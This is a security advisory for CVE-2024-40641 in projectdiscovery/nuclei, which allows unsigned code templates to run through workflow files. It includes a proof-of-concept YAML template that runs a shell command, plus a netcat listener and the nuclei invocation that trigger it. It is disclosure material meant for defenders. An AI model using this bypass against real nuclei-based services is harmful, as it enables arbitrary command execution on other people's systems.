GHSA-c3q9-c27p-cw9h
Suggest an improvement- Source
- https://github.com/advisories/GHSA-c3q9-c27p-cw9h
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/07/GHSA-c3q9-c27p-cw9h/GHSA-c3q9-c27p-cw9h.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-c3q9-c27p-cw9h
- Aliases
-
- CVE-2024-40641
- GO-2024-2989
- Published
- 2024-07-17T19:32:23Z
- Modified
- 2024-08-20T14:57:15Z
- Severity
-
- 7.4 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N CVSS Calculator
- 8.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N CVSS Calculator
- Summary
- projectdiscovery/nuclei allows unsigned code template execution through workflows
- Details
-
Summary
Find a way to execute code template without -code option and signature.
Details
write a
code.yaml:id: code info: name: example code template author: ovi3 code: - engine: - sh - bash source: | id http: - raw: - | POST /re HTTP/1.1 Host: {{Hostname}} {{code_response}} workflows: - matchers: - name: tusing nc to listen on 80:
nc -lvvnp 80execute PoC template with nuclei:
./nuclei -disable-update-check -w code.yaml -u http://127.0.0.1 -vv -debugand nc will get
idcommand output.We use
-wto specify a workflow file, not-tto template file. and notice there is aworkflowsfield in code.yaml to pretend to be a workflow file.Test in Linux and Nuclei v3.2.9
Impact
Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)
- References
Affected packages
Go / github.com/projectdiscovery/nuclei/v3
Package
- Name
- github.com/projectdiscovery/nuclei/v3
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/projectdiscovery/nuclei/v3